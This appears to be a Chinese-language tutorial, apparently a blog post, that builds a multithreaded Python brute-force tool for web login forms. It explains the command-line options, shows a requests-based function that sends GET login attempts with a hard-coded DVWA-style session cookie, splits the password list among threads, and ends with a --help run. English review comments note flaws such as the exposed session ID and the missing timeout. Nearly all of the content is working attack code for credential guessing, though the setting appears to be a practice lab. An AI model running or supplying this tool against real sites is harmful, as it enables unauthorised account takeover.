账号密码爆破
大致流程
```mermaid
graph TD
st[程序开始执行] --> op(程序各项参数说明)
op --> op1(requests编写一个扫描模块)
op1 --> op2(对读取到的密码分配给指定的线程 注意向上取整)
op2 --> op3(读取name,调用多线程模块实现多线程)
op3 --> op4[程序结束]
```
根据程序需要, 选用 optparse 来接收命令行参数并实现 --help 功能; 用 math 模块在按线程分配密码时向上取整, 使 password 全部被分配到线程里面; 调用 requests 实现 post 和 get 类型的请求; 用 threading 模块实现多线程功能.
-
导入相应的模块
import optparse import math import threading import requests
-
程序说明(--help信息)
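# Command-line interface: target URL, username file, password file and the
# number of chunks the password list is split into.
parser = optparse.OptionParser()
parser.usage = "web_burte_command.py -u url -n user_file -p pass_file -t num"
parser.add_option("-u", "--site", dest="website", help="website to test",
                  action="store", type="string", metavar="URL")
parser.add_option("-n", "--namefile", dest="namefile", help="name from file",
                  action="store", type="string", metavar="NAMEFILE")
parser.add_option("-p", "--passfile", dest="passfile", help="pass from file",
                  action="store", type="string", metavar="PASSFILE")
# type="int" lets optparse reject a non-numeric value with a usage error
# instead of a ValueError traceback from int().
parser.add_option("-t", "--threads", dest="threads", help="num of threads",
                  action="store", type="int", metavar="THREAD")
(options, args) = parser.parse_args()

# All four options are required. Without this check a missing -t reached
# int(None) and raised TypeError, and a missing file option only failed later
# at open().
required = (
    ("-u", options.website),
    ("-n", options.namefile),
    ("-p", options.passfile),
    ("-t", options.threads),
)
absent = [opt for opt, value in required if value is None]
if absent:
    parser.error("missing required option(s): " + ", ".join(absent))
# The thread count is used as a divisor when the password list is split, so
# zero or a negative number must be refused here.
if options.threads < 1:
    parser.error("-t must be a positive integer")

ths = options.threads
pass_dic = options.passfile
user_dic = options.namefile
site = options.website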
-
requests实现扫描模块(注意爆破的时候是get类型还是post类型)
def scan(payload):
    """Send one login request per candidate password for a single username.

    ``payload`` is a dict holding ``"username"`` and ``"pass_list"`` (the
    chunk of candidate passwords assigned to this thread). Each candidate is
    sent as a GET request to the module-level ``site``; the length of the
    response body is printed together with the attempted pair. Nothing is
    returned.
    """
    user = payload["username"]
    # NOTE(review): the session cookie is hard-coded. A PHPSESSID published
    # together with the source should be treated as exposed and invalidated;
    # normally it would come from an option or the environment.
    request_headers = {"Cookie": "security=high; security=high; PHPSESSID=lip25ut7pltp2nkjrgd68l9fq5"}
    for password in payload["pass_list"]:
        # POST variant kept from the original, for forms that submit in the body:
        # r = requests.post(url = site, data = {"username":user, "password":password.strip(), "submit":"submit"})
        # Adjust the parameter names to match the form under test.
        # NOTE(review): with GET the credentials travel in the query string, so
        # each attempted password typically ends up in server and proxy access
        # logs.
        query = {"username": user, "password": password.strip(), "Login": "Login"}
        # NOTE(review): no timeout is passed and request exceptions are not
        # caught, so a stalled connection blocks this thread indefinitely.
        r = requests.get(url=site, params=query, headers=request_headers)
        # The response length is the only signal printed; the code does not
        # inspect the status code or the body.
        print(str(len(r.text)) + "username: " + user + " ; " + "password : " + password + "\n")
-
password分配到每个线程里面
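# Split the password file into per-thread chunks: pass_list == [[...], [...], ...]
pass_list = []
result_num = 0  # number of passwords placed in each chunk

if ths < 1:
    # ths is the divisor below; zero raised ZeroDivisionError and a negative
    # value produced a single unsplit chunk.
    raise ValueError("thread count must be at least 1")

with open(pass_dic, "r") as f:
    # Strip the trailing newline (and surrounding whitespace) from every line.
    temp_list = [line.strip() for line in f]

num = len(temp_list)
# Round up so that every password lands in some chunk even when the line
# count is not a multiple of the thread count.
result_num = math.ceil(num / ths)

# Slice in steps of result_num. The earlier counter-based loop always appended
# the leftover list at the end, which added an empty chunk (and later an idle
# thread) whenever num was an exact multiple of result_num.
if result_num:
    pass_list = [temp_list[start:start + result_num]
                 for start in range(0, num, result_num)]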
-
读取name文件并且开启多线程功能
# Pair every username with every password chunk; each pair becomes the payload
# of one scan() thread.
with open(user_dic, "r") as name_file:
    user_list = name_file.readlines()

# NOTE(review): the number of threads created is len(user_list) * len(pass_list),
# so -t sets the number of chunks per username and does not cap total
# concurrency.
ths_list = [
    threading.Thread(
        target=scan,
        args=({"username": name.strip(), "pass_list": chunk},),
    )
    for name in user_list
    for chunk in pass_list
]

# Threads are started but never joined; they are non-daemon threads, so the
# interpreter stays alive until they finish.
for worker in ths_list:
    worker.start()
-
程序试运行
```
pig@deep:~/Desktop/web_pass_burte$ ls
name.txt  pass.txt  web_burte_command.py
pig@deep:~/Desktop/web_pass_burte$ python3 web_burte_command.py --help
Usage: web_burte_command.py -u url -n user_file -p pass_file -t num

Options:
  -h, --help            show this help message and exit
  -u URL, --site=URL    website to test
  -n NAMEFILE, --namefile=NAMEFILE
                        name from file
  -p PASSFILE, --passfile=PASSFILE
                        pass from file
  -t THREAD, --threads=THREAD
                        num of threads
pig@deep:~/Desktop/web_pass_burte$
```